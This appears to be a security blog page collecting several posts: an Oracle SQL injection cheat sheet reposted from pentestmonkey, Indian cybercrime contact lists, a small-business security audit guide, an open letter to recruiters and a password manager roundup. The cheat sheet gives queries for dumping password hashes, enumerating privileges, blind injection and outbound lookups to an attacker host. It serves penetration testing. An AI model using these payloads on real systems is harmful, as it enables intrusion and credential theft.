SQL Injection Cheat Sheet for ORACLE

This below blog post is shamelessly copy pasted from http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet

:) I do not own any of the writings below. This is just a repost and all credits to pentestmonkey.net

Thanks for sharing.


This post is part of a series of SQL Injection Cheat Sheets.  In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend.  This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet.
The complete list of SQL Injection Cheat Sheets I’m working is:

• Oracle
• MSSQL
• MySQL
• PostgreSQL
• Ingres
• DB2
• Informix

I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.
Some of the queries in the table below can only be run by an admin.  These are marked with “– priv” at the end of the query.

Version	SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’; SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’; SELECT version FROM v$instance;
Comments	SELECT 1 FROM dual — comment – NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name ‘dual’ when we’re not actually selecting from a table.
Current User	SELECT user FROM dual
List Users	SELECT username FROM all_users ORDER BY username; SELECT name FROM sys.user$; — priv
List Password Hashes	SELECT name, password, astatus FROM sys.user$ — priv, <= 10g.  astatus tells you if acct is locked SELECT name,spare4 FROM sys.user$ — priv, 11g
Password Cracker	checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10.
List Privileges	SELECT * FROM session_privs; — current privs SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s privs SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, find users with a particular priv SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
List DBA Accounts	SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, list DBAs, DBA roles
Current Database	SELECT global_name FROM global_name; SELECT name FROM v$database; SELECT instance_name FROM v$instance; SELECT SYS.DATABASE_NAME FROM DUAL;
List Databases	SELECT DISTINCT owner FROM all_tables; — list schemas (one per user) – Also query TNS listener for other databases.  See tnscmd (services | status).
List Columns	SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’; SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;
List Tables	SELECT table_name FROM all_tables; SELECT owner, table_name FROM all_tables;
Find Tables From Column Name	SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; — NB: table names are upper case
Select Nth Row	SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — gets 9th row (rows numbered from 1)
Select Nth Char	SELECT substr(‘abcd’, 3, 1) FROM dual; — gets 3rd character, ‘c’
Bitwise AND	SELECT bitand(6,2) FROM dual; — returns 2 SELECT bitand(6,1) FROM dual; — returns0
ASCII Value -> Char	SELECT chr(65) FROM dual; — returns A
Char -> ASCII Value	SELECT ascii(‘A’) FROM dual; — returns 65
Casting	SELECT CAST(1 AS char) FROM dual; SELECT CAST(’1′ AS int) FROM dual;
String Concatenation	SELECT ‘A’ || ‘B’ FROM dual; — returns AB
If Statement	BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; — doesn’t play well with SELECT statements
Case Statement	SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1 SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2
Avoiding Quotes	SELECT chr(65) || chr(66) FROM dual; — returns AB
Time Delay	BEGIN DBMS_LOCK.SLEEP(5); END; — priv, can’t seem to embed this in a SELECT SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — if reverse looks are slow SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — if forward lookups are slow SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — if outbound TCP is filtered / slow – Also see Heavy Queries to create a time delay
Make DNS Requests	SELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual; SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual;
Command Execution	Javacan be used to execute commands if it’s installed.ExtProc can sometimes be used too, though it normally failed for me.
Local File Access	UTL_FILE can sometimes be used.  Check that the following is non-null: SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’;Java can be used to read and write files if it’s installed (it is not available in Oracle Express).
Hostname, IP Address	SELECT UTL_INADDR.get_host_name FROM dual; SELECT host_name FROM v$instance; SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — gets hostnames
Location of DB files	SELECT name FROM V$DATAFILE;
Default/System Databases	SYSTEM SYSAUX

Misc Tips

In no particular order, here are some suggestions from pentestmonkey readers.
From Christian Mehlmauer:

Get all tablenames in one string	select rtrim(xmlagg(xmlelement(e, table_name || ‘,’)).extract(‘//text()’).extract(‘//text()’) ,’,') from all_tables –  when using union based SQLI with only one row
Blind SQLI in order by clause	order by case when ((select 1 from user_tables where substr(lower(table_name), 1, 1) = ‘a’ and rownum = 1)=1) then column_name1 else column_name2 end — you must know 2 column names with the same datatype

Cyber Crime!!! Important Emergency Contacts (INDIA)

Are your friends getting SPAM mails from your E-mail Account? . I suppose that your email address must be hacked or your computer itself must be compromised where the attacker has gathered your email id and password. Keep your email accounts and bank accounts as safe as possible. If any case of misuse of email address or cybercrime then do feel free to report it. I will give you few information on it which would be useful for you in future. Moreover be careful using computers in internet cafe or any PC which you do not know. First do a virus check on your computer. Check if there is any kind of malware sitting in your computer. If yes then clean it first. Remember if your computer itself is compromised then attacker can see and trace every keystroke in your keyboard. That is why you have virtual keyboards in any net banking login page. Remember to use that virtual keyboard from next time in bank login page. Anyways still if you face any troubles online then you can always call the cyber crime department in Tamilnadu(INDIA). Will Update the Global Cyber Crime Cell numbers Shortly.

In case of any major problems you can call the numbers below.

Deputy Commissioner , CyberCrime department - (044) - 23452214
Assistant commissioner , BankFraud department - (044) - 23452384




The below is a list of the major ISP's in india and whom to report when you face any cybercrimes or malicious activities .

Aksh Broadband
web site url : Aksh Broadband Limited

postmaster@akshbroadband.in

Avadh Online - ISP based in Lucknow.

web site url : Lucknow-avadh.com-UP Board results 2001 XII,lucknow's no.1 portal-news,lucknow,entertainment,astrology

postmaster@avadh.com

BSES - Power Surfer
web site url : powersurfer.net | 123Triad Reviews Broadband Internet Scams, Rip Offs , Complaints


postmaster@powersurfer.net

BSES TeleCom Limited : ISP in Mumbai.

web site url : Powered by 123Triad Web Design :bses.net Reviews Movies Industry Scams, RipOffs,Testimonials

postmaster@bses.net

CJ Online

web site url : CJonline :- Bringing the world together

postmaster@cjnet4u.com

Estel
web site url : LETS NET TOGETHER

postmaster@estelcom.com
support@estelcom.com
techsupport@bharti.com

Gateway Systems India

web site url : http://www.gatewaysys.com/

postmaster@gatewaysys.com
abuse@gatewaysys.com
support@gatewaysys.com

Hathway

web site url : Hathway : Get Connected

postmaster@hathway.com (for hathway.com)
abuse@airtelbroadband.in (for hathway.com)
abuse@hathway.com (for hathway.com)
spam@hathway.net (for hathway.com)
vijaym@hathway.net (for hathway.com)

In2Cable (India) Ltd

web site url : In2cable.com

postmaster@in2cable.com (for in2cable.com)
abuse@in2cable.com (for in2cable.com)

Mantra Online(AIRTEL)

web site url : Bharti

abuse@bharti.com (for bharti.com)
helpdesk.network@bharti.com (for bharti.com)
incident@cert-in.org.in (for bharti.com)

Mantra Online

web site url : http://www.mantraonline.com/mantra.html

abuse@airtelbroadband.in (for mantraonline.com)
abuse@bharti.com (for mantraonline.com)
helpdesk.network@bharti.com (for mantraonline.com)
incident@cert-in.org.in (for mantraonline.com)

Pacific Internet

web site url : Internet Service Providers India - Pacnet

abuse@pacific.net.in (for pacific.net.in)

Primus Telecommunications

web site url : Primus Telecommunications - VoIP, Broadband Phone Service, Voice, Data, and Carrier Services Provider

abuse@primushost.com

SancharNet - BSNL Internet Dialup Service

web site url : Home

abuse@bsnl.in (for sancharnet.in)
dnwplg@sancharnet.in (for sancharnet.in)
incident@cert-in.org.in (for sancharnet.in)

Sify Limited
web site url : Sify Technologies Limited - Leader in Internet Solutions, eCommerce Services, Internet Business Consulting Provider India.

abuse@satyam.net.in (for sifycorp.com)
customercare@satyam.net.in (for sifycorp.com)

Spectranet

web site url : Home

postmaster@spectranet.com (for spectranet.com)
noc@spectranet.com (for spectranet.com)
spectracare@spectranet.com (for spectranet.com)
abuse@spectranet.com (for spectranet.com)

Tata Indicom Broadband
web site url : Broadband from Tata Indicom: Leading Hi Speed Broadband internet service provider in India. Apply for super fast internet connection now. Get Hi Speed Broadband from Tata Indicom. Broadband India's way to sucess

postmaster@tataindicombroadband.in

Tatanova .
web site url : Tata Indicom : Wireless Internet, Wireless Phones & Mobile Phones

postmaster@tatanova.com (for tatanova.com)
abuse@tataisp.com (for tatanova.com)
postmaster@tataisp.com (for tatanova.com)
customercare@tatanova.com (for tatanova.com)
feedback.tatanova@tataisp.com (for tatanova.com)
idcmum@tataisp.com (for tatanova.com)

Videsh Sanchar Nigam Limited (VSNL).

web site url : Tata Communications

postmaster@vsnl.in (for vsnl.in)
abuse@vsnl.net (for vsnl.in)
abuse@vsnl.com (for vsnl.in)
customerservice@vsnl.co.in (for vsnl.in)





Hope the Information was useful. Share it with people who are unaware of cyber crime. Awareness will stop most of the crime. ;) Cheers

10 Steps to Create Your Own Security Audit

Every business has valuable IT assets such as computers, networks, and data. And protecting those assets requires that companies big and small conduct their own IT security audits in order to get a clear picture of the security risks they face and how to best deal with those threats.

The following are 10 steps to conducting your own basic IT security audit. While these steps won't be as extensive as audits provided by professional consultants, this DIY version will get you started on the road to protecting your own company.

1. Defining the Scope of Your Audit: Creating Asset Lists and a Security Perimeter

The first step in conducting an audit is to create a master list of the assets your company has, in order to later decide upon what needs to be protected through the audit. While it is easy to list your tangible assets, things like computers, servers, and files, it becomes more difficult to list intangible assets. To ensure consistency in deciding which intangible company assets are included, it is helpful to draw a "security perimeter" for your audit.

What is the Security Perimeter?
The security perimeter is both a conceptual and physical boundary within which your security audit will focus, and outside of which your audit will ignore. You ultimately decide for yourself what your security perimeter is, but a general rule of thumb is that the security perimeter should be the smallest boundary that contains the assets that you own and/or need to control for your own company's security.

Assets to Consider
Once you have drawn up your security perimeter, it is time to complete your asset list. That involves considering every potential company asset and deciding whether or not it fits within the "security perimeter" you have drawn. To get you started, here is a list of common sensitive assets:

1. Computers and laptops
2. Routers and networking equipment
3. Printers
4. Cameras, digital or analog, with company-sensitive photographs
5. Data - sales, customer information, employee information
6. Company smartphones/ PDAs
7. VoIP phones, IP PBXs (digital version of phone exchange boxes), related servers
8. VoIP or regular phone call recordings and records
9. Email
10. Log of employees daily schedule and activities
11. Web pages, especially those that ask for customer details and those that are backed by web scripts that query a database
12. Web server computer
13. Security cameras
14. Employee access cards.
15. Access points (i.e., any scanners that control room entry)

This is by no means an exhaustive list, and you should at this point spend some time considering what other sensitive assets your company has. The more detail you use in listing your company's assets (e.g., "25 Dell Laptops Model D420 Version 2006", instead of "25 Computers") the better, because this will help you recognize more clearly the specific threats which face each particular company asset.

2. Creating a 'Threats List'

You can't protect assets simply by knowing what they are, you also have to understand how each individual asset is threatened. So in this stage you will compile an overall list of threats which currently face your assets.

What Threats to Include?
If your threat list is too broad, your security audit will end up getting focused on threats which are extremely small or remote. When deciding whether to include a particular threat on your 'Threat List' keep in mind that your test should follow a sliding scale. For example, if you are considering whether the possibility of a hurricane flooding out your servers you should consider both, how remote the threat is, but also how devastating the harm would be if it occurred. A moderately remote harm can still be reasonably included in your threat list if the potential harm it would bring is large enough to your company.

Common 'Threats' to Get you Started?
Here are some relatively common security threats to help you get started in creating your company's threat list:

1. Computer and network passwords. Is there a log of all people with passwords (and what type). How secure is this ACL list, and how strong are the passwords currently in use?
2. Physical assets. Can computers or laptops be picked up and removed from the premises by visitors or even employees?
3. Records of physical assets. Do they exist? Are they backed up?
4. Data backups. What backups of virtual assets exist, how are they backed up, where are the backups kept, and who conducts the backups?
5. Logging of data access. Each time someone accesses some data, is this logged, along with who, what, when, where, etc.?
6. Access to sensitive customer data, e.g., credit card info. Who has access? How can access be controlled? Can this information be accessed from outside the company premises?
7. Access to client lists. Does the website allow backdoor access into the client database? Can it be hacked?
8. Long-distance calling. Are long-distance calls restricted, or is it a free-for-all? Should it be restricted?
9. Emails. Are spam filters in place? Do employees need to be educated on how to spot potential spam and phishing emails? Is there a company policy that outgoing emails to clients not have certain types of hyperlinks in them?

3. Past Due Diligence & Predicting the Future

At this point, you have compiled a list of current threats, but what about security threats that have not come on to your radar yet, or haven't even been developed? A good security audit should account not just for those security threats that face your company today, but those that will arise in the future.

Examining Your Threat History
The first step towards predicting future threats is to examine your company's records and speak with long-time employees about past security threats that the company has faced. Most threats repeat themselves, so by cataloging your company's past experiences and including the relevant threats on your threat list you'll get a more complete picture of your company's vulnerabilities.

Checking Security Trends
In addition to checking for security threats specific to your particular industry,check with IT security threat list which will keep you abreast of all new security threat developments. Spend some time looking through these resources and consider how these trends are likely to affect your business in particular. If you're stumped on what to do here then Ask the IT Security Experts directly.

Checking with your Competition
When it comes to outside security threats, companies that are ordinarily rivals often turn into one another's greatest asset. By developing a relationship with your competition you can develop a clearer picture of the future threats your company will face by sharing information about security threats with one another.

4. Prioritizing Your Assets & Vulnerabilities

You have now developed a complete list of all the assets and security threats that your company faces. But not every asset or threat has the same priority level. In this step, you will prioritize your assets and vulnerabilities in order to know your company's greatest security risks, and so that you can allocate your company's resources accordingly.

Perform a Risk Calculation/ Probability Calculation
The bigger the risk, the higher priority dealing with the underlying threat is. The formula for calculating risk is:

Risk = Probability x Harm

The risk formula just means that you multiply the likelihood of a security threat actually occurring (probability) times the damage that would occur to your company if the threat actually did occur (harm). The number that comes out of that equation, is the risk that threat poses to your company.

Calculating Probability
Probability is simply the chance that a particular threat will actually occur. Unfortunately, there isn't a book that lists the probability that your website will be hacked this year, so you have to come up with those figures yourself.

Your first step in calculating probability should be to do some research into your company's history with this threat, your competitors' history, and any empirical studies on how often most companies face this threat. Any probability figure that you ultimately come up with is an estimate, but the more accurate the estimate, the better your risk calculation will be.

Calculating Harm
How much damage would a particular threat cause if it occurred? Calculating the potential harm of a threat can be done in a number of different ways. You might count up the cost in dollars that replacing the lost revenue or asset would cost the company. Or instead you might calculate the harm as the number of man-hours which would be lost trying to remedy the damage once it has occurred. But whatever method you use, it is important that you stay consistent throughout the audit in order to get an accurate priorities list.

Developing Your Security Threat Response Plan

When working down your newly developed priority list, there will be a number of potential responses you could make to any particular threat. The remaining six points in this article cover the primary responses a company can make to a particular threat. While these security responses are by no means the only appropriate ways to deal with a security threat, they will cover the vast majority of the threats your company faces, and as a result you should go through this list of potential responses before considering any alternatives.

5. Implementing Network Access Controls

Network Access Controls, or NACs, check the security of any user trying to access a network. So, for example, if you are trying to come up with a solution for the security threat of your competition stealing company information from private parts of the company's website, applying network access controls or NACs is an excellent solution.
Part of implementing effective NAC is to have an ACL (Access Control List), which indicates user permissions to various assets and resources. Your NAC might also include steps such as; encryption, digital signatures, ACLs, verifying IP addresses, user names, and checking cookies for web pages.

6. Implementing Intrusion Prevention

While a Network Access Control deals with threats of unauthorized people accessing the network by taking steps like password protecting sensitive data, an Intrustion Prevention System (IPS) prevents more malicious attacks from the likes of hackers.

The most common form of an IPS is a second generation firewall. Unlike first generation firewalls, which were merely content based filters, a second generation firewall adds to the content filter a 'Rate-based filter'.

• Content-based. The firewall does a deep pack inspection, which is a thorough look at actual application content, to determine if there are any risks.
• Rate-based. Second generation firewalls perform advanced analyses of either web or network traffic patterns or inspection of application content, flagging unusual situations in either case.

7. Implementing Identity & Access Management

Identity and Access Management (IAM) simply means controlling users' access to specific assets. Under an IAM, users have to manually or automatically identify themselves and be authenticated. Once authenticated, they are given access to those assets to which they are authorized.

An IAM is a good solution when trying to keep employees from accessing information they are not authorized to access. So, for instance, if the threat is that employees will steal customers credit card information, an IAM solution is your best bet.

8. Creating Backups

When we think of IT security threats, the first thing that comes to mind is hacking. But a far more common threat to most companies is the accidental loss of information. Although it's not sexy, the most common way to deal with threats of information loss is to develop a plan for regular backups. These are a few of the most common backup options and questions you should consider when developing your own backup plan:

• Onsite storage. Onsite storage can come in several forms, including removable hard drives or tape backups stored in a fireproofed, secured-access room. The same data can be stored on hard drives which are networked internally but separated by a DMZ (demilitarized zone) from the outside world.
• Offsite storage. Mission-critical data could be stored offsite, as an extra backup to onsite versions. Consider worst-case scenarios: If a fire occurred, would your hard-drives or digital tapes be safe? What about in the event of a hurricane or earthquake? Data can be moved offsite manually on removable media, or through a VPN (Virtual Private Network) over the Internet.
• Secured access to backups. Occasionally, the need to access data backups will arise. Access to such backups, whether to a fireproofed room or vault, or to an offsite data center, physically or through a VPN, must be secure. This could mean issuing keys, RFID-enabled "smart pass cards", VPN passwords, safe combinations, etc.
• Scheduling backups. Backups should be automated as much as possible, and scheduled to cause minimum disruption to your company. When deciding on the frequency of backups, be aware that if your backups aren't frequent enough to be relevant when called upon, they are not worth conducting at all.

9. Email Protection & Filtering

Each day, 55 billion spam messages are sent by email throughout the world. To limit the security risk that unwanted emails pose, spam filters and an educated workforce are a necessary part of every company's security efforts. So, if the threat you are confronting is spam emails, the obvious (and correct) response is to implement an email security and filtering system for your company.

While the specific email security threats confronting your company will determine the appropriate email protections you choose, here are a few common features:

• Encrypt emails. When sending sensitive emails to other employees at other locations, or to clients, emails should be encrypted. If you have international clients, make sure that you use encryption allowed outside of the United States and Canada.
• Try steganography. Steganography is a technique for hiding information discreetly in the open, such as within a digital image. However, unless combined with something like encryption, it is not secure and could be detected.
• Don't open unexpected attachments. Even if you know the sender, if you are not expecting an email attachment, don't open it, and teach your employees to do the same.
• Don't open unusual email. No spam filter is perfect. But if your employees are educated about common spam techniques, you can help keep your company assets free of viruses.

10. Preventing Physical Intrusions

Despite the rise of new generation threats like hacking and email spam, old threats still imperil company assets. One of the most common threats is physical intrusions. If, for example, you are trying to deal with the threat of a person breaking into the office and stealing company laptops, and along with them valuable company information, then a plan for dealing with physical intrusions is necessary.

Here are some common physical threats along with appropriate solutions for dealing with them:

• Breaking into the office: Install a detection system. Companies like ADT have a variety of solutions for intrusion detection and prevention, including video surveillance systems.
• Stolen laptop: Encrypt hard drive. Microsoft offers an Encrypt File System, or EFS, which can be used to encrypt sensitive files on a laptop.
• Stolen screaming smart phones. A new service from Synchronica protect smartphones and PDAs, should they be stolen. Once protected, a stolen phone cannot be used without an authorization code. If this is not given correctly, all data is wiped from the phone and a high-pitch "scream" is emitted. Once your phone is recovered, the data can be restored from remote servers. Currently, this particular service is limited to the UK, but comparable services are available throughout the world.
• Kids + Pets = Destruction: Prevent unauthorized access. For many small-business owners, the opportunity to work from home is an important perk. But having children and/or pets invading office space and assets can often be a greater risk that that posed by hackers. By creating an appropriate-use policy and sticking with it small business owners can quickly deal with one of their most significant threats.
• Internal Click Fraud: Education and Blocks. Many web-based businesses run advertising such as Google AdSense or Chitika to add an extra revenue stream. However, inappropriate clicking of the ads by employees or family can cause your account to be suspended. Make employees aware of such things, and prevent the company's live website from being viewed internally.

Conclusion

These 10 steps to conducting your own IT Security Audit will take you a long way towards becoming more aware of the security threats facing your company as well as help you begin to develop a plan for confronting those threats. But it is important to remember that security threats are always changing, and keeping your company safe will require that you continually assess new threats and revisit your response to old ones.

I understand even these steps would have been difficult for most of you who are reading it. If you think it’s not your cup of tea then I better recommend you to leave it to the security auditors to do the complete job on your Information Security part. I hope you know where to find the security auditor. ;). I would like to thank IT security website which gave me a lot of idea and thoughts on this article to share with you all here.

For The IT recruiters and Hiring managers (Must Read)

Open Letter from Geeks to IT Recruiters and Hiring Managers

Preface: No, I'm not looking for a job. I just wanted all the IT recruiters and Hiring Managers to read this. I've seen it before, and my friends (some currently unemployed) are seeing it still.

For the love of all things good in the world, learn how to hire and employ a geek. You're doing it wrong.

Office Politics
Try to measure productivity in output, not in hours.

Geeks automate. Geeks script. Geeks compile. They summon computing power to get things done quickly on their behalf. If your geek seemingly spends all day on Orkut and Facebook but somehow manages to still complete tasks ahead of schedule, your geek is multi-tasking. This is normal.

Assign tasks to the geeks who are most interested in them, not the ones with the most experience.

When geeks are interested, they are passionate. When they're passionate, they learn fast. You'll get more productivity out of an interested geek with no prior experience than you will with a bored drone who's been doing the same thing for the past five years. Sometimes, the one with the most experience is the one that's most interested. In those cases, you are a lucky manager!

Segregate the corporate, compensatory hierarchy from the leadership hierarchy.

With a team of geeks under you, one or more will eventually become to go-to guy (or girl) for certain things. You don't usually need to assign a "team lead" - Through meritocracy, the Alpha Geek will emerge. That Alpha Geek may lack seniority, but will have the most influence. It's best to let this occur naturally. It's awkward when the one who best fits the role has to answer to someone else just because they've been around longer. Furthermore, the members of your team will still go to the Alpha Geek because the wrong person has the "Team Lead" label. As Paul Glen puts it: Geeks don't hate hierarchy. They hate your hierarchy.

You'll know you've found the Alpha Geek when you see people from your team (and likely other teams) at said geek's desk getting advice or validation on a frequent basis.

Pre-hiring and interview
Have all screening and profile "paperwork" in one comprehensive online wizard or form.

Geeks do not like pens, pencils, or clip boards. We also despise giving you the same piece of information more than once on fifteen different sheets of paper. We'd rather not be sitting on an uncomfortable chair in a room that's far too brightly lit just so that we can give you the information that you want. It's easy to get the information to you electronically.

Only ask for information you need to make a hiring decision.

W2's, Direct deposit information, full fingerprints, home address and all that crap can be handled during orientation. The only personally identifiable information you need before hiring is a name.

Don't grill us on our resume and work history.

You don't hire a geek for what he or she did two years ago. You hire them for what they will be able to do for you now and in the future. Ask your geek to describe scenarios where problems arose that required them to pick up a new skill set to solve. All geeks worth their salt have stories like that and love telling them.

Instead of asking about skills that qualify them for the position, ask about their interest in the kind of work they think they'll be doing.

Remember: Interested geeks work harder. The above requirement will still let you H.R. types ask that oh-so-predictable question: "What is it that you think this company does?" while offering your candidate a chance to really show he or she will be a good match.

6 Free Ways to Manage All Your Passwords

Its very difficult to remembers all of your passwords, the easy options to remebers them is using the same password each time or writing them down on paper or in a spreadsheet but that one i not so secure. In fact, security experts strongly warn against these options as they leave you vulnerable to online theft. So am here posting some of the best password managers that can help you to remember all you password safely.

KeyPass Password Safe: KeePass is a free, open source, light-weight and easy-to-use password manager for Windows and mobile devices. It will store an unlimited number of passwords and will automatically fill username and password fields, or you can fill them yourself with copy-and-paste or drag-and-drop. And, since it’s open source, there are several unofficial projects that bring KeePass to other platforms like Mac OS X, Linux, and Pocket PC.

Password Manager Plus: The Billeo Free Password Manager Plus toolbar works with both Firefox and Internet Explorer, and allows you to store not only passwords but credit card numbers and online account information, and can autofill your information as you shop online or paying bills, for example.

RoboForm 6.9: RoboForm makes logging into Web sites and filling forms faster, easier, and more secure. RoboForm provides storage for all types of information and complete automation for filling out forms on the web. It gives you several encryption options, enables true “one-click” logins, will generate strong, random passwords for you, can handle complex web forms without being “trained,” and that’s just the tip of the iceberg. If you want it, RoboForm’s probably got it.
RoboForm also has Windows Mobile, Pocket PC, Palm, and Symbian versions too, but for those of us without handheld computers RoboForm brings RoboForm2Go, a portable app designed to live entirely on a portable storage device like a pocket USB drive. This lets you bring your whole collection of secure information, plus RoboForm’s automatic form-filling magic, anywhere

Clipperz: Unlike most password managers, this solution is online ” so you can access it anywhere. And it stores more than passwords ” credit card numbers, account numbers, anything really. Storing passwords and other confidential information online can make someplace nervous, but Clipperz uses an encryption method that means not even Clipperz knows what its storing. This is a good solution if you need access to your passwords from multiple computers, rather than just one or two.

Password generator: This is a little bookmarklet that combines your master password with the sites name to create a stronger password, and one that is different for each site. Very handy and simple.

Password Hasher: This Firefox extension generates strong passwords for you by scrambling your master password with the sites name. The passwords generated by this extension are better than any you could come up with yourself.

These are the few ways to manage all your passwords but remember these are the best ways to hack all your passwords together too. But be safe don't fall into social engineering and let the others use your computer if you are using these kinds of password managers. If the attacker tries to get into your computer and cracks your password manager then all your passwords are revealed to him. So be safe in using these kind of password managers. ;) So you decide your self what is this post for? Benefit for you for tracking all the passwords or is it a real security threat?? I am confused too ;) You need to store all your passwords somewhere because you cannot remember them all. But at the same time its a security threat too.. ;) So always remember you atleast store the passwords in a jumble way to keep your accounts safe.

Ok people I'll get back to you when i have more thoughts on this password manager.